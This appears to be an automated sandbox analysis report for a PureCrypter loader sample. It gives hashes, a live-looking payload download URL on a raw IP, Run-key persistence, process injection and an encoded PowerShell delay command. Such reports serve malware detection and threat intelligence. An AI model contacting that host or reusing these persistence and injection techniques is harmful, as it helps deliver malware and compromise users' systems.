Analysis
-
max time kernel
112s -
max time network
116s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
13-02-2023 07:21
Behavioral task
behavioral1
Sample
e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
Resource
win10v2004-20221111-en
General
-
Target
e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe
-
Size
41KB
-
MD5
ab4a6ddfc90f2d379d70d0fad747f6e5
-
SHA1
87ac21f928c9f4e3d76cc6ea110b6133defd8507
-
SHA256
e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90
-
SHA512
d0512d9629ffe3feee10f8f6bfa5419f97e1da78e7972866f76270326657b5760cc3bb3c594fe4ebbbb22571429f0fe88a007f75991db39136d22ff8dd274815
-
SSDEEP
768:ppoHKflwYtttWtYtYBtYtxqGGGGGGGGHGGGGGGGGGGGGGGGGGGGGGGGGGGGGUu8y:DoHFGGGGGGGGHGGGGGGGGGGGGGGGGGGH
Malware Config
Extracted
purecrypter
http://163.123.142.210/Zhevuwz.dat
Signatures
-
PureCrypter
PureCrypter is a .NET malware loader first seen in early 2021.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vokaupcde = "\"C:\\Users\\Admin\\AppData\\Roaming\\Rrlirudzf\\Vokaupcde.exe\"" e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2728 set thread context of 5040 2728 e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe 89 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 996 powershell.exe 996 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2728 e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe Token: SeDebugPrivilege 996 powershell.exe Token: SeDebugPrivilege 5040 e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2728 wrote to memory of 996 2728 e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe 81 PID 2728 wrote to memory of 996 2728 e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe 81 PID 2728 wrote to memory of 5040 2728 e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe 89 PID 2728 wrote to memory of 5040 2728 e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe 89 PID 2728 wrote to memory of 5040 2728 e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe 89 PID 2728 wrote to memory of 5040 2728 e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe 89 PID 2728 wrote to memory of 5040 2728 e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe 89 PID 2728 wrote to memory of 5040 2728 e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe"C:\Users\Admin\AppData\Local\Temp\e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe"1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:996
-
-
C:\Users\Admin\AppData\Local\Temp\e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exeC:\Users\Admin\AppData\Local\Temp\e1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5040
-
Network
-
GEThttp://163.123.142.210/Zhevuwz.date1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exeRemote address:163.123.142.210:80RequestGET /Zhevuwz.dat HTTP/1.1
Host: 163.123.142.210
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 13 Feb 2023 07:22:03 GMT
Content-Type: application/octet-stream
Content-Length: 1541653
Last-Modified: Thu, 09 Feb 2023 23:51:37 GMT
Connection: keep-alive
ETag: "63e58709-178615"
Accept-Ranges: bytes
-
163.123.142.210:80http://163.123.142.210/Zhevuwz.dathttpe1614217a227ee00d452c21059af1d4572420cd6079d384ec265e2b1a5192f90.exe36.4kB 1.6MB 679 1137
HTTP Request
GET http://163.123.142.210/Zhevuwz.datHTTP Response
200 -
322 B 7
-
322 B 7
-
322 B 7
-
260 B 5
-
322 B 7
-
322 B 7
-
260 B 5
-
260 B 5
-
208 B 4